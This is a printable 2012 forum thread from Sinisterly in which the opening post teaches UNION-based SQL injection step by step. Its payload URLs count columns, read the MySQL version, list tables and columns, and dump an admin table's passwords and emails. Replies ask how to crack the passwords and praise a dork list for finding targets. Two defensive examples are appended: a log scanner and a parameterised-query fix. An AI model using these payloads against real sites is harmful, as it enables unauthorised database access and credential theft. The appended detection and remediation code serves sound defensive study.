SQL injection tutorial - Printable Version
Sinisterly (https://sinister.ly)
Thread: SQL injection tutorial (/Thread-SQL-injection-tutorial--40790)

SQL injection tutorial - princeshama - 03-27-2012

This is a tutorial for SQL injection. Now let's start.

Use Google to search for dorks. For searching for SQL vulnerable sites, you can use these dorks:

Injecting a site

Now you've got your vulnerable site:

http://www.site.com/news.php?id=-17'

Add ' to the end to check if it's vulnerable. It gets an error, so I know it's vulnerable. So I remove the ' and do:

http://www.site.com/news.php?id=17 order by 1--
http://www.site.com/news.php?id=17 order by 2--
http://www.site.com/news.php?id=17 order by 3--

No errors, so I continue, etc. I finally get an error when I do it like below:

http://www.site.com/news.php?id=17 order by 13--

So this tells me 13 columns don't exist, so there must be 12 columns in the database. Next I do the UNION SELECT function as shown below:

http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12--

(Note: make sure to add a - in between = and 17, like =-17, in the ID.)

I hit Enter. Numbers 4 and 5 appear; this means data can be extracted from numbers four and five. I replace 4 in the URL with @@version so it now looks like:

http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12--

Then I hit Enter:

5.0.32-Debian_7etch8-log

^ This is the MySQL version running. So it's running version 5; that helps a lot (with versions 4 and below we have to guess the table names).

Now, where we put @@version (4th spot), replace it with group_concat(table_name) (this gets the table names), like:

http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12--

And at the end of the UNION SELECT string, remove the -- after the 12 and add:

+from+information_schema.tables+where+table_schema=database()--

So it now looks like:

http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12 +from+information_schema.tables+where+table_schema=database()--

I now see:

x_admins,x_articles,x_ban,x_banners,x_banners_info,x_comments,x_file_categories,x_file_data,x_forum_a,x_forum_b,x_forum_c,x_gbook,x_infopages,x_links_categories,x_links_data,x_mails,x_menu,x_news,x_poll_data,x_poll_desc,x_pw,x_topic,x_users

Now replace group_concat(table_name) with group_concat(column_name), and everything after UNION SELECT 5,6,7,8,9,10,11,12 with:

+from+information_schema.columns+where+table_name='x_admins'--

So it goes from:

http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12 +from+information_schema.tables+where+table_schema=database()--

to:

http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12 +from+information_schema.columns+where+table_name='x_admins'--

We see:

id,nick,pass,name,added,access,mail,stat

Learn about grouping at this point, but now we add group_concat(id,0x3a,pass,0x3a,mail) to where the group_concat(column_name) is and add +from+x_admins-- after 10,11,12. So the string becomes:

http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,group_concat(id,0x3a,pass,0x3a,mail),5,6,7,8,9,10,11,12 +from+x_admins--

At this point we obtain the admin's password.

RE: SQL injection tutorial - grouver08 - 04-22-2012

I tried to follow the tutorial but I receive an error... Does that mean the site is no longer vulnerable?

SELECT * FROM news WHERE news_id=-22 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--

SELECT command denied to user 'main_wellerpools'@'72.167.232.226' for table 'tables'

RE: SQL injection tutorial - grouver08 - 04-22-2012

Is there a way to decrypt the password?

RE: SQL injection tutorial - TheSkillfularrow - 04-22-2012

It's a very long list, keep it up.

RE: SQL injection tutorial - Kelv1n - 04-24-2012

Nice list of dorks.. I bet some people will find this useful.

RE: SQL injection tutorial - Hippo - 04-24-2012

Yap, dorks list amazing, I try it with BackTrack sqlmap. Thanks for share.

RE: SQL injection tutorial - BatTok - 04-24-2012

Nice share mate..

RE: SQL injection tutorial - brocca - 04-30-2012

Thanks for sharing this bro.

RE: SQL injection tutorial - A.W.H - 01-19-2013

Thank you for sharing. Nice and simple to comprehend; the best kind of tutorial.
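
Added example, not part of the original thread: the request sequence the first post walks through (quote probe, ORDER BY column counting, UNION SELECT, information_schema enumeration) leaves a recognisable trail in web server access logs, and this sketch flags clients that match several of those steps. The log lines, IP addresses and rule names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines; the IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.9 - - [27/Mar/2012:10:00:01 +0000] "GET /news.php?id=17' HTTP/1.1" 200 512
203.0.113.9 - - [27/Mar/2012:10:00:05 +0000] "GET /news.php?id=17+order+by+1-- HTTP/1.1" 200 2048
203.0.113.9 - - [27/Mar/2012:10:00:09 +0000] "GET /news.php?id=17+order+by+13-- HTTP/1.1" 200 512
203.0.113.9 - - [27/Mar/2012:10:00:20 +0000] "GET /news.php?id=-17+UNION+SELECT+1,2,3,@@version,5-- HTTP/1.1" 200 2100
203.0.113.9 - - [27/Mar/2012:10:00:31 +0000] "GET /news.php?id=-17+UNION+SELECT+1,group_concat(table_name),3+from+information_schema.tables-- HTTP/1.1" 200 2300
198.51.100.4 - - [27/Mar/2012:10:01:00 +0000] "GET /news.php?id=17 HTTP/1.1" 200 2048
198.51.100.4 - - [27/Mar/2012:10:01:02 +0000] "GET /shop.php?sort=order%20by%20price HTTP/1.1" 200 900
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Rule names are hypothetical labels, one per step of the walkthrough.
RULES = {
    "quote_probe": re.compile(r"=[-\w]*'(?:&|$)"),
    "order_by_n": re.compile(r"\border\s+by\s+\d+"),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "version_probe": re.compile(r"@@version"),
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
    "schema_enum": re.compile(r"\binformation_schema\."),
}

def scan(log_text):
    """Return {client_ip: set of rule names matched in decoded query strings}."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, url = m.groups()
        query = unquote_plus(url.partition("?")[2]).lower()
        for name, rule in RULES.items():
            if rule.search(query):
                hits[ip].add(name)
    return dict(hits)

def flagged(hits, min_rules=2):
    """Clients that matched at least min_rules distinct rules, sorted."""
    return sorted(ip for ip, names in hits.items() if len(names) >= min_rules)

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG).items():
        print(ip, sorted(names))
```

An access log records only the query string, so the same strings sent in a POST body are visible only with WAF or application-level logging.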
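
Added example, not part of the original thread: the query shape the tutorial depends on (a numeric id concatenated into the SQL string) beside its validated, parameterised form. SQLite stands in for MySQL so the block runs offline; the news table, the function names and all rows are assumptions, and x_admins follows the table name quoted in the first post.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the site's database; all rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE x_admins (id INTEGER PRIMARY KEY, nick TEXT, pass TEXT);
        INSERT INTO news VALUES (17, 'Launch day', 'constructed article body');
        INSERT INTO x_admins VALUES (1, 'admin', 'constructed-hash-value');
    """)
    return conn

def get_news_vulnerable(conn, raw_id):
    # The flaw: the request parameter becomes part of the SQL text, so the
    # database parses whatever the client appended to the number.
    sql = f"SELECT id, title, body FROM news WHERE id = {raw_id}"
    return conn.execute(sql).fetchall()

def get_news_safe(conn, raw_id):
    # Layer 1: the parameter is meant to be numeric, so reject anything else.
    try:
        news_id = int(raw_id)
    except (ValueError, TypeError):
        return []
    # Layer 2: bind the value; it travels as data and is never parsed as SQL.
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    return conn.execute(sql, (news_id,)).fetchall()

# Constructed input with the same shape as the URLs in the first post.
APPENDED_QUERY = "-17 UNION SELECT id, nick, pass FROM x_admins"

if __name__ == "__main__":
    db = make_db()
    print(get_news_vulnerable(db, "17"))
    print(get_news_vulnerable(db, APPENDED_QUERY))  # rows from x_admins leak
    print(get_news_safe(db, APPENDED_QUERY))        # rejected before the query
```

The "SELECT command denied" error quoted in the second post shows a further layer, a database account restricted in what it may read; that narrows what an injection can reach but does not remove the injection.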